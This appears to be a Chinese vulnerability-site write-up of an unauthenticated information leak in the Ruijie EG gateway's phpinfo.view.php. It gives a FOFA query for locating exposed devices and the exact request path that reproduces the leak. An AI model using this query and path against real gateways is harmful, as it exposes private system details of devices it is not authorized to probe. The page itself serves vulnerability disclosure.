锐捷EG易网关_phpinfo.view.php_信息泄露漏洞-棉花糖会员站

锐捷EG易网关_phpinfo.view.php_信息泄露漏洞

7月15日发布

0100

# 锐捷EG易网关 phpinfo.view.php 信息泄露漏洞

## 漏洞描述

锐捷EG易网关部分版本 phpinfo.view.php文件权限设定存在问题，导致未经身份验证获取敏感信息

## 漏洞影响

> 锐捷EG易网关

## FOFA

> app=”Ruijie-EG易网关”

## 漏洞复现

查看源码发现phpinfo文件

![](/static/qingy/锐捷EG易网关_phpinfo.view.php_信息泄露漏洞/img/ruijie-31.png)

访问 url

“`
/tool/view/phpinfo.view.php
“`

![](/static/qingy/锐捷EG易网关_phpinfo.view.php_信息泄露漏洞/img/ruijie-32.png)

© 版权声明

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

喜欢就支持一下吧

相关推荐

评论抢沙发

请登录后发表评论

请登录后查看评论内容